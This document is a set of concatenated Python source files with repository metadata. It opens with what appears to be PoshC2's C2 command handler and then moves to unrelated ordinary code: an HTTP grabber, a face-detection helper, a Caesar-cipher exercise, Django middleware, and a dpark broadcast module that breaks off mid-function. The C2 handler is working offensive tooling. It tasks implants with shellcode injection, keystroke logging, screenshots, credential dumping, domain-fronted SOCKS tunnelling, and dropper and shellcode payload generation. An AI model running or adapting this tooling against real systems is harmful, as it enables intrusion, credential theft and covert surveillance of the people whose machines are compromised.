def handle_sharp_command(command, user, randomuri, implant_id):
# alias mapping
for alias in cs_alias:
if alias[0] == command[:len(command.rstrip())]:
command = alias[1]
# alias replace
for alias in cs_replace:
if command.startswith(alias[0]):
command = command.replace(alias[0], alias[1])
original_command = command
command = command.strip()
run_autoloads_sharp(command, randomuri, user)
if command.startswith("searchhelp"):
do_searchhelp(user, command, randomuri)
return
elif command.startswith("searchallhelp"):
do_searchallhelp(user, command, randomuri)
return
elif command.startswith("searchhistory"):
do_searchhistory(user, command, randomuri)
return
elif command.startswith("upload-file"):
do_upload_file(user, command, randomuri)
return
elif command.startswith("inject-shellcode"):
do_inject_shellcode(user, command, randomuri)
return
elif command.startswith("migrate"):
do_migrate(user, command, randomuri)
return
elif command == "kill-implant" or command == "exit":
do_kill_implant(user, command, randomuri)
return
elif command == "sharpsocks":
do_sharpsocks(user, command, randomuri)
return
elif (command.startswith("stop-keystrokes")):
do_stop_keystrokes(user, command, randomuri)
return
elif (command.startswith("start-keystrokes")):
do_start_keystrokes(user, command, randomuri)
return
elif (command.startswith("get-keystrokes")):
do_get_keystrokes(user, command, randomuri)
return
elif (command.startswith("get-screenshotmulti")):
do_get_screenshotmulti(user, command, randomuri)
return
elif command.startswith("get-screenshot"):
do_get_screenshot(user, command, randomuri)
return
elif command == "getpowerstatus":
do_get_powerstatus(user, command, randomuri)
return
elif command == "stoppowerstatus":
do_stoppowerstatus(user, command, randomuri)
return
elif command.startswith("run-exe SharpWMI.Program") and "execute" in command and "payload" not in command:
do_sharpwmi_execute(user, command, randomuri)
return
elif (command.startswith("get-hash")):
do_get_hash(user, command, randomuri)
return
elif (command.startswith("enable-rotation")):
do_rotation(user, command, randomuri)
return
elif (command.startswith("safetykatz")):
do_safetykatz(user, command, randomuri)
return
elif command.startswith("loadmoduleforce"):
do_loadmoduleforce(user, command, randomuri)
return
elif command.startswith("loadmodule"):
do_loadmodule(user, command, randomuri)
return
elif command.startswith("listmodules"):
do_listmodules(user, command, randomuri)
return
elif command.startswith("modulesloaded"):
do_modulesloaded(user, command, randomuri)
return
elif command.startswith("pbind-connect"):
do_pbind_start(user, command, randomuri)
return
elif command.startswith("fcomm-connect"):
do_fcomm_start(user, command, randomuri)
return
elif command.startswith("dynamic-code"):
do_dynamic_code(user, command, randomuri)
return
elif command.startswith("startdaisy"):
do_startdaisy(user, command, randomuri)
return
elif command == "help":
do_help(user, command, randomuri)
return
else:
if command:
do_shell(user, original_command, randomuri)
return
def do_searchhelp(user, command, randomuri):
searchterm = (command).replace("searchhelp ", "")
helpful = sharp_help.split('\n')
for line in helpful:
if searchterm in line.lower():
print(Colours.GREEN + line)
def do_searchallhelp(user, command, randomuri):
searchterm = (command).replace("searchallhelp ", "")
for line in allhelp:
if searchterm in line.lower():
print(Colours.GREEN + line)
def do_searchhistory(user, command, randomuri):
searchterm = (command).replace("searchhistory ", "")
with open('%s/.implant-history' % PoshProjectDirectory) as hisfile:
for line in hisfile:
if searchterm in line.lower():
print(Colours.GREEN + line.replace("+", ""))
def do_upload_file(user, command, randomuri):
# TODO lots of common code
source = ""
destination = ""
if command == "upload-file":
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.upload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
except KeyboardInterrupt:
return
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
destination = session.prompt("Location to upload to: ")
else:
args = argp(command)
source = args.source
destination = args.destination
try:
destination = destination.replace("\\", "\\\\")
print("")
print("Uploading %s to %s" % (source, destination))
uploadcommand = f"upload-file {source} {destination}"
new_task(uploadcommand, user, randomuri)
except Exception as e:
print("Error with source file: %s" % e)
traceback.print_exc()
def do_inject_shellcode(user, command, randomuri):
params = re.compile("inject-shellcode", re.IGNORECASE)
params = params.sub("", command)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Location of shellcode file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bin"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
try:
shellcodefile = load_file(path)
if shellcodefile is not None:
new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri)
except Exception as e:
print("Error loading file: %s" % e)
def do_migrate(user, command, randomuri):
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
implant = get_implantdetails(randomuri)
implant_arch = implant.Arch
implant_comms = implant.Pivot
if implant_arch == "AMD64":
arch = "64"
else:
arch = "86"
if implant_comms == "C#":
path = "%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
shellcodefile = load_file(path)
elif "Daisy" in implant_comms:
daisyname = input("Name required: ")
path = "%s%sSharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, daisyname, arch)
shellcodefile = load_file(path)
elif "Proxy" in implant_comms:
path = "%sProxySharp_v4_x%s_Shellcode.bin" % (PayloadsDirectory, arch)
shellcodefile = load_file(path)
new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri)
def do_kill_implant(user, command, randomuri):
impid = get_implantdetails(randomuri)
ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid.ImplantID)
if ri.lower() == "n":
print("Implant not terminated")
if ri == "":
new_task("exit", user, randomuri)
kill_implant(randomuri)
if ri.lower() == "y":
new_task("exit", user, randomuri)
kill_implant(randomuri)
def do_exit(user, command, randomuri):
return do_kill_implant(user, command, randomuri)
def do_sharpsocks(user, command, randomuri):
from random import choice
allchar = string.ascii_letters
channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key().decode("utf-8")
sharpurls = get_sharpurls()
sharpurls = sharpurls.split(",")
sharpurl = select_item("PayloadCommsHost", "C2Server").replace('"', '').split(',')[0]
user_agent = select_item("UserAgent", "C2Server")
dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))
print("\nIf using Docker, change the SocksHost to be the IP of the PoshC2 Server not 127.0.0.1:49031")
print("sharpsocks -t latest -s \"-c=%s -k=%s --verbose -l=http://*:%s\"\r" % (channel, sharpkey, SocksHost.split(":")[2]) + Colours.GREEN)
print("\nElse\n")
print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN)
ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
if ri == "":
if dfheader:
new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), dfheader, user_agent), user, randomuri)
else:
new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), user_agent), user, randomuri)
if ri.lower() == "y":
if dfheader:
new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), dfheader, user_agent), user, randomuri)
else:
new_task("run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), user_agent), user, randomuri)
print("SharpSocks task issued, to stop SharpSocks run stopsocks")
def do_stop_keystrokes(user, command, randomuri):
new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
update_label("", randomuri)
def do_start_keystrokes(user, command, randomuri):
check_module_loaded("Logger.exe", randomuri, user)
new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
update_label("KEYLOG", randomuri)
def do_get_keystrokes(user, command, randomuri):
new_task("run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
def do_get_screenshotmulti(user, command, randomuri):
pwrStatus = get_powerstatusbyrandomuri(randomuri)
if (pwrStatus is not None and pwrStatus[7]):
ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
if ri.lower() == "n" or ri.lower() == "":
return
new_task(command, user, randomuri)
update_label("SCREENSHOT", randomuri)
def do_get_screenshot(user, command, randomuri):
pwrStatus = get_powerstatusbyrandomuri(randomuri)
if (pwrStatus is not None and pwrStatus[7]):
ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
if ri.lower() == "n" or ri.lower() == "":
return
new_task(command, user, randomuri)
def do_get_powerstatus(user, command, randomuri):
getpowerstatus(randomuri)
new_task("run-dll PwrStatusTracker.PwrFrm PwrStatusTracker GetPowerStatusResult ", user, randomuri)
def do_stoppowerstatus(user, command, randomuri):
new_task(command, user, randomuri)
update_label("", randomuri)
def do_get_hash(user, command, randomuri):
check_module_loaded("InternalMonologue.exe", randomuri, user)
new_task("run-exe InternalMonologue.Program InternalMonologue", user, randomuri)
def do_safetykatz(user, command, randomuri):
new_task("run-exe SafetyKatz.Program %s" % command, user, randomuri)
def do_loadmoduleforce(user, command, randomuri):
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
def do_loadmodule(user, command, randomuri):
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
def do_listmodules(user, command, randomuri):
modules = os.listdir(ModulesDirectory)
modules = sorted(modules, key=lambda s: s.lower())
print("")
print("[+] Available modules:")
print("")
for mod in modules:
if (".exe" in mod) or (".dll" in mod):
print(mod)
def do_modulesloaded(user, command, randomuri):
implant_details = get_implantdetails(randomuri)
print(implant_details.ModsLoaded)
new_task("listmodules", user, randomuri)
def do_help(user, command, randomuri):
print(sharp_help)
def do_shell(user, command, randomuri):
new_task(command, user, randomuri)
def do_rotation(user, command, randomuri):
domain = input("Domain or URL in array format: \"https://www.example.com\",\"https://www.example2.com\" ")
domainfront = input("Domain front URL in array format: \"fjdsklfjdskl.cloudfront.net\",\"jobs.azureedge.net\" ")
new_task("dfupdate %s" % domainfront, user, randomuri)
new_task("rotate %s" % domain, user, randomuri)
def do_sharpwmi_execute(user, command, randomuri):
style = Style.from_dict({'': '#80d130'})
session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Location of base64 vbs/js file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.b64"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
new_task("%s payload=%s" % (command, payload), user, randomuri)
else:
print_bad("Could not find file")
def do_pbind_start(user, command, randomuri):
key = get_baseenckey()
if len(command.split()) == 2: # 'pbind-connect <hostname>' is two args
command = f"{command} {PBindPipeName} {PBindSecret} {key}"
elif len(command.split()) == 4: # if the pipe name and secret are already present just add the key
command = f"{command} {key}"
else:
print_bad("Expected 'pbind_connect <hostname>' or 'pbind_connect <hostname> <pipename> <secret>'")
return
new_task(command, user, randomuri)
def do_fcomm_start(user, command, randomuri):
key = get_baseenckey()
if len(command.split()) == 1: # 'fcomm-connect' is one args
command = f"{command} {FCommFileName} {key}"
elif len(command.split()) == 2: # if the file name is already there then just add the key
command = f"{command} {key}"
else:
print_bad("Expected 'fcomm_connect' or 'fcomm_connect <filename>'")
return
new_task(command, user, randomuri)
def do_dynamic_code(user, command, randomuri):
compile_command = "mono-csc %sDynamicCode.cs -out:%sPoshC2DynamicCode.exe -target:exe -warn:2 -sdk:4" % (PayloadsDirectory, PayloadsDirectory)
try:
subprocess.check_output(compile_command, shell=True)
except subprocess.CalledProcessError:
return
command = command.replace("dynamic-code", "").strip()
check_module_loaded(f"{PayloadsDirectory}PoshC2DynamicCode.exe", randomuri, user, force=True)
new_task(f"run-exe PoshC2DynamicCode.Program PoshC2DynamicCode {command}", user, randomuri)
def do_startdaisy(user, command, randomuri):
check_module_loaded("daisy.dll", randomuri, user)
elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
domain_front = ""
proxy_user = ""
proxy_pass = ""
proxy_url = ""
cred_expiry = ""
if elevated.lower() == "n":
cont = input(Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END)
if cont.lower() == "n" or cont == "":
return
bind_ip = "localhost"
else:
bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END)
bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END)
firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END)
default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
default_df_header = get_first_dfheader(DomainFrontHeader)
if default_df_header == default_url:
default_df_header = None
if firstdaisy.lower() == "y" or firstdaisy == "":
upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {default_url}): " + Colours.END)
domain_front = input(Colours.GREEN + f"Domain front header (leave blank for {str(default_df_header)}): " + Colours.END)
proxy_user = input(Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END)
proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END)
proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END)
cred_expiry = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018: ")
if not upstream_url:
upstream_url = default_url
if not domain_front:
if default_df_header:
domain_front = default_df_header
else:
domain_front = ""
else:
upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END)
upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END)
upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
domain_front = upstream_daisy_host
urls = get_allurls().replace(" ", "")
useragent = UserAgent
command = f"invoke-daisychain \"{bind_ip}\" \"{bind_port}\" {upstream_url} \"{domain_front}\" \"{proxy_url}\" \"{proxy_user}\" \"{proxy_pass}\" \"{useragent}\" {urls}"
new_task(command, user, randomuri)
update_label("DaisyHost", randomuri)
createpayloads = input(Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ")
if createpayloads.lower() == "y" or createpayloads == "":
name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
daisyhost = get_implantdetails(randomuri)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"", "\"\"", proxy_url, proxy_user, proxy_pass, cred_expiry)
newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, PowerShellProxyCommand=proxynone, URLID=urlId)
newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
newPayload.CreateDroppers(name)
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
print_good("Created new %s daisy payloads" % name)
|
nettitude/PoshC2
|
poshc2/client/command_handlers/SharpHandler.py
|
Python
|
bsd-3-clause
| 21,566
|
"""Grabber for collecting data"""
import urllib2
from random import sample
from veliberator.settings import PROXY_SERVERS
class Grabber(object):
"""Url encapsultation for making request throught HTTP"""
page = None
data = None
def __init__(self, url, proxies=PROXY_SERVERS):
"""Init the grabber"""
self.url = url
self.proxies = proxies
self.opener = self.build_opener()
def build_opener(self):
"""Build the url opener"""
handlers = []
if self.proxies:
server = sample(self.proxies, 1)[0]
handlers.append(urllib2.ProxyHandler({'http': server}))
return urllib2.build_opener(*handlers)
@property
def content(self):
"""Return the data grabbed"""
if self.data:
return self.data
try:
self.page = self.opener.open(self.url)
self.data = ''.join(self.page.readlines())
self.page.close()
return self.data
except:
return ''
|
Fantomas42/veliberator
|
veliberator/grabber.py
|
Python
|
bsd-3-clause
| 1,041
|
import os
import numpy as np
import torch
from ..core import FaceDetector
class FolderDetector(FaceDetector):
'''This is a simple helper module that assumes the faces were detected already
(either previously or are provided as ground truth).
The class expects to find the bounding boxes in the same format used by
the rest of face detectors, mainly ``list[(x1,y1,x2,y2),...]``.
For each image the detector will search for a file with the same name and with one of the
following extensions: .npy, .t7 or .pth
'''
def __init__(self, device, path_to_detector=None, verbose=False):
super(FolderDetector, self).__init__(device, verbose)
def detect_from_image(self, tensor_or_path):
# Only strings supported
if not isinstance(tensor_or_path, str):
raise ValueError
base_name = os.path.splitext(tensor_or_path)[0]
if os.path.isfile(base_name + '.npy'):
detected_faces = np.load(base_name + '.npy')
elif os.path.isfile(base_name + '.t7'):
detected_faces = torch.load(base_name + '.t7')
elif os.path.isfile(base_name + '.pth'):
detected_faces = torch.load(base_name + '.pth')
else:
raise FileNotFoundError
if not isinstance(detected_faces, list):
raise TypeError
return detected_faces
@property
def reference_scale(self):
return 195
@property
def reference_x_shift(self):
return 0
@property
def reference_y_shift(self):
return 0
|
1adrianb/face-alignment
|
face_alignment/detection/folder/folder_detector.py
|
Python
|
bsd-3-clause
| 1,643
|
'''
This mission is the part of the set. Another one - Caesar cipher decriptor.
Your mission is to encrypt a secret message (text only, without special chars like "!", "&", "?" etc.) using Caesar cipher where each letter of input text is replaced by another that stands at a fixed distance. For example ("a b c", 3) == "d e f"
example
Input: A secret message as a string (lowercase letters only and white spaces)
Output: The same string, but encrypted
Precondition:
0 < len(text) < 50
-26 < delta < 26
'''
def to_encrypt(text, delta):
alpha = 'abcdefghijklmnopqrstuvwxyz'
result = ''
for letter in text:
index = alpha.find(letter)
if(index > -1):
print(index+delta)
result = result + result.join(alpha[(index + delta) % 26])
else:
result = result + result.join(' ')
return result
if __name__ == '__main__':
print("Example:")
print(to_encrypt('abc', 10))
#These "asserts" using only for self-checking and not necessary for auto-testing
assert to_encrypt("a b c", 3) == "d e f"
assert to_encrypt("a b c", -3) == "x y z"
assert to_encrypt("simple text", 16) == "iycfbu junj"
assert to_encrypt("important text", 10) == "swzybdkxd dohd"
assert to_encrypt("state secret", -13) == "fgngr frperg"
print("Coding complete? Click 'Check' to earn cool rewards!")
|
lisprolog/python
|
to_encrypt.py
|
Python
|
bsd-3-clause
| 1,378
|
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from threading import local
USER_ATTR_NAME = getattr(settings, 'LOCAL_USER_ATTR_NAME', '_current_user')
_thread_locals = local()
def _do_set_current_user(user_fun):
setattr(_thread_locals, USER_ATTR_NAME, user_fun.__get__(user_fun, local))
def _set_current_user(user=None):
'''
Sets current user in local thread.
Can be used as a hook e.g. for shell jobs (when request object is not
available).
'''
_do_set_current_user(lambda self: user)
class ThreadLocalUserMiddleware(object):
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
# request.user closure; asserts laziness;
# memorization is implemented in
# request.user (non-data descriptor)
_do_set_current_user(lambda self: getattr(request, 'user', None))
response = self.get_response(request)
return response
def get_current_user():
current_user = getattr(_thread_locals, USER_ATTR_NAME, None)
if callable(current_user):
return current_user()
return current_user
def get_current_authenticated_user():
current_user = get_current_user()
if isinstance(current_user, AnonymousUser):
return None
return current_user
|
PaesslerAG/django-currentuser
|
django_currentuser/middleware.py
|
Python
|
bsd-3-clause
| 1,343
|
from __future__ import absolute_import
import os
import zmq
import uuid as uuid_pkg
import time
import binascii
import random
import socket
import struct
import marshal
import mmap
from multiprocessing import Manager, Condition
from mmap import ACCESS_WRITE, ACCESS_READ
from dpark.utils.log import get_logger
from dpark.utils import compress, decompress, spawn
from dpark.cache import Cache
from dpark.serialize import marshalable
from dpark.env import env
import six
from six.moves import range, map, cPickle
try:
from itertools import izip
except ImportError:
izip = zip
logger = get_logger(__name__)
MARSHAL_TYPE, PICKLE_TYPE = list(range(2))
BLOCK_SHIFT = 20
BLOCK_SIZE = 1 << BLOCK_SHIFT
GUIDE_ADDR = 'NewBroadcastGuideAddr'
DOWNLOAD_ADDR = 'NewDownloadAddr'
BATCHED_BLOCKS = 3
GUIDE_STOP, GUIDE_GET_SOURCES, GUIDE_SET_SOURCES, GUIDE_REPORT_BAD = list(range(4))
SERVER_STOP, SERVER_FETCH, SERVER_FETCH_FAIL, SERVER_FETCH_OK, \
DATA_GET, DATA_GET_OK, DATA_GET_FAIL, DATA_DOWNLOADING, SERVER_CLEAR_ITEM = list(range(9))
class GuideManager(object):
def __init__(self):
self._started = False
self.guides = {}
self.host = socket.gethostname()
self.guide_thread = None
self.guide_addr = None
self.register_addr = {}
self.ctx = zmq.Context()
def start(self):
if self._started:
return
self._started = True
self.guide_thread = self.start_guide()
env.register(GUIDE_ADDR, self.guide_addr)
def start_guide(self):
sock = self.ctx.socket(zmq.REP)
port = sock.bind_to_random_port('tcp://0.0.0.0')
self.guide_addr = 'tcp://%s:%d' % (self.host, port)
def run():
logger.debug("guide start at %s", self.guide_addr)
while self._started:
if not sock.poll(1000, zmq.POLLIN):
continue
type_, msg = sock.recv_pyobj()
if type_ == GUIDE_STOP:
sock.send_pyobj(0)
break
elif type_ == GUIDE_GET_SOURCES:
uuid = msg
sources = None
if uuid in self.guides:
sources = self.guides[uuid]
else:
logger.warning('uuid %s NOT REGISTERED in guide server', uuid)
sock.send_pyobj(sources)
elif type_ == GUIDE_SET_SOURCES:
uuid, addr, bitmap = msg
if any(bitmap):
sources = None
if uuid in self.guides:
sources = self.guides[uuid]
if sources:
sources[addr] = bitmap
else:
self.guides[uuid] = {addr: bitmap}
self.register_addr[uuid] = addr
sock.send_pyobj(None)
elif type_ == GUIDE_REPORT_BAD:
uuid, addr = msg
sources = self.guides[uuid]
if addr in sources:
if addr != self.register_addr[uuid]:
del sources[addr]
else:
logger.warning('The addr %s to delete is the register Quit!!!', addr)
sock.send_pyobj(None)
else:
logger.error('Unknown guide message: %s %s', type_, msg)
sock.send_pyobj(None)
return spawn(run)
def shutdown(self):
if not self._started:
return
self._started = False
if self.guide_thread and self.guide_addr. \
startswith('tcp://%s:' % socket.gethostname()):
self.guide_thread.join(timeout=1)
if self.guide_thread.is_alive():
logger.warning("guide_thread not stopped.")
self.guide_addr = None
def check_memory(location):
try:
import psutil
pid = os.getpid()
p = psutil.Process(pid)
rss = p.memory_info().rss >> 20
logger.info('memory rss %d MB in host %s at ',
rss, socket.gethostname(), location)
except ImportError:
logger.warning('import psutil failed')
class DownloadManager(object):
def __init__(self):
self._started = False
self.server_thread = None
self.download_threads = {}
self.uuid_state_dict = None
self.uuid_map_dict = None
self.guide_addr = None
self.server_addr = None
self.host = None
self.ctx = None
self.random_inst = None
self.master_broadcast_blocks = {}
def start(self):
if self._started:
return
self.manager = manager = Manager()
self.shared_uuid_fn_dict = manager.dict()
self.shared_uuid_map_dict = manager.dict()
self.shared_master_blocks = manager.dict()
self.download_cond = Condition()
self._started = True
self.ctx = zmq.Context()
self.host = socket.gethostname()
if GUIDE_ADDR not in env.environ:
start_guide_manager()
self.guide_addr = env.get(GUIDE_ADDR)
self.random_inst = random.SystemRandom()
self.server_addr, self.server_thread = self.start_server()
self.uuid_state_dict = {}
self.uuid_map_dict = {}
self.master_broadcast_blocks = {}
env.register(DOWNLOAD_ADDR, self.server_addr)
def start_server(self):
sock = self.ctx.socket(zmq.REP)
sock.setsockopt(zmq.LINGER, 0)
port = sock.bind_to_random_port("tcp://0.0.0.0")
server_addr = 'tcp://%s:%d' % (self.host, port)
guide_sock = self.ctx.socket(zmq.REQ)
guide_sock.setsockopt(zmq.LINGER, 0)
guide_sock.connect(self.guide_addr)
def run():
logger.debug("server started at %s", server_addr)
while self._started:
if not sock.poll(1000, zmq.POLLIN):
continue
type_, msg = sock.recv_pyobj()
logger.debug('server recv: %s %s', type_, msg)
if type_ == SERVER_STOP:
sock.send_pyobj(None)
break
elif type_ == SERVER_FETCH:
uuid, indices, client_addr = msg
if uuid in self.master_broadcast_blocks:
block_num = len(self.master_broadcast_blocks[uuid])
bls = []
for index in indices:
if index >= block_num:
logger.warning('input index too big %s for '
'len of blocks %d from host %s',
str(indices), block_num, client_addr)
sock.send_pyobj((SERVER_FETCH_FAIL, None))
else:
bls.append(self.master_broadcast_blocks[uuid][index])
sock.send_pyobj((SERVER_FETCH_OK, (indices, bls)))
elif uuid in self.uuid_state_dict:
fd = os.open(self.uuid_state_dict[uuid][0], os.O_RDONLY)
mmfp = mmap.mmap(fd, 0, access=ACCESS_READ)
os.close(fd)
bitmap = self.uuid_map_dict[uuid]
block_num = len(bitmap)
bls = []
for index in indices:
if index >= block_num:
logger.warning('input index too big %s for '
'len of blocks %d from host %s',
str(indices), block_num, client_addr)
sock.send_pyobj((SERVER_FETCH_FAIL, None))
else:
mmfp.seek(bitmap[index][0])
block = mmfp.read(bitmap[index][1])
bls.append(block)
mmfp.close()
sock.send_pyobj((SERVER_FETCH_OK, (indices, bls)))
else:
logger.warning('server fetch failed for uuid %s '
'not exists in server %s from host %s',
uuid, socket.gethostname(), client_addr)
sock.send_pyobj((SERVER_FETCH_FAIL, None))
elif type_ == DATA_GET:
uuid, compressed_size = msg
if uuid not in self.uuid_state_dict or not self.uuid_state_dict[uuid][1]:
if uuid not in self.download_threads:
sources = self._get_sources(uuid, guide_sock)
if not sources:
logger.warning('get sources from guide server failed in host %s',
socket.gethostname())
sock.send_pyobj(DATA_GET_FAIL)
continue
self.download_threads[uuid] = spawn(self._download_blocks,
*[sources, uuid, compressed_size])
sock.send_pyobj(DATA_DOWNLOADING)
else:
sock.send_pyobj(DATA_DOWNLOADING)
else:
sock.send_pyobj(DATA_GET_OK)
elif type_ == SERVER_CLEAR_ITEM:
uuid = msg
self.clear(uuid)
sock.send_pyobj(None)
else:
logger.error('Unknown server message: %s %s', type_, msg)
sock.send_pyobj(None)
sock.close()
logger.debug("stop Broadcast server %s", server_addr)
for uuid in list(self.uuid_state_dict.keys()):
self.clear(uuid)
return server_addr, spawn(run)
def get_blocks(self, uuid):
if uuid in self.master_broadcast_blocks:
return self.master_broadcast_blocks[uuid]
if uuid in self.shared_master_blocks:
return self.shared_master_blocks[uuid]
def register_blocks(self, uuid, blocks):
if uuid in self.master_broadcast_blocks:
logger.warning('the block uuid %s exists in dict', uuid)
return
self.master_broadcast_blocks[uuid] = blocks
self.shared_master_blocks[uuid] = blocks
def _get_sources(self, uuid, source_sock):
try:
source_sock.send_pyobj((GUIDE_GET_SOURCES,
uuid))
sources = source_sock.recv_pyobj()
except:
logger.warning('GET sources failed for addr %s with ZMQ ERR',
self.server_addr)
sources = {}
return sources
def _update_sources(self, uuid, bitmap, source_sock):
try:
source_sock.send_pyobj((GUIDE_SET_SOURCES,
(uuid, self.server_addr, bitmap)))
source_sock.recv_pyobj()
except:
pass
def _download_blocks(self, sources, uuid, compressed_size):
block_num = 0
bitmap = [0]
write_mmap_handler = None
download_guide_sock = self.ctx.socket(zmq.REQ)
download_guide_sock.setsockopt(zmq.LINGER, 0)
download_guide_sock.connect(self.guide_addr)
def _report_bad(addr):
logger.debug('fetch blocks failed from server %s', addr)
download_guide_sock.send_pyobj((GUIDE_REPORT_BAD, (uuid, addr)))
download_guide_sock.recv_pyobj()
def _fetch(addr, indices, bit_map):
sock = self.ctx.socket(zmq.REQ)
try:
sock.setsockopt(zmq.LINGER, 0)
sock.connect(addr)
sock.send_pyobj((SERVER_FETCH, (uuid, indices, self.server_addr)))
avail = sock.poll(1 * 1000, zmq.POLLIN)
check_sock = None
if not avail:
try:
check_sock = socket.socket()
addr_list = addr[len('tcp://'):].split(':')
addr_list[1] = int(addr_list[1])
check_sock.connect(tuple(addr_list))
except Exception as e:
logger.warning('connect the addr %s failed with exception %s',
addr, e)
_report_bad(addr)
else:
logger.debug("%s recv broadcast %s from %s timeout",
self.server_addr, str(indices), addr)
finally:
if check_sock:
check_sock.close()
return
result, msg = sock.recv_pyobj()
if result == SERVER_FETCH_FAIL:
_report_bad(addr)
return
if result == SERVER_FETCH_OK:
indices, blocks = msg
for rank, index in enumerate(indices):
if blocks[rank] is not None:
write_mmap_handler.seek(bit_map[index][0])
write_mmap_handler.write(blocks[rank])
bitmap[index] = bit_map[index]
else:
raise RuntimeError('Unknown server response: %s %s' % (result, msg))
finally:
sock.close()
final_path = env.workdir.alloc_tmp_file("broadcast")
self.uuid_state_dict[uuid] = (final_path, False)
fp = open(final_path, 'wb')
fp.truncate(compressed_size)
fp.close()
fd = os.open(final_path, os.O_RDWR)
write_mmap_handler = mmap.mmap(fd, 0,
access=ACCESS_WRITE)
os.close(fd)
while not all(bitmap):
remote = []
for _addr, _bitmap in six.iteritems(sources):
if block_num == 0:
block_num = len(_bitmap)
bitmap = [0] * block_num
self.uuid_map_dict[uuid] = bitmap
if not _addr.startswith('tcp://%s:' % self.host):
remote.append((_addr, _bitmap))
self.random_inst.shuffle(remote)
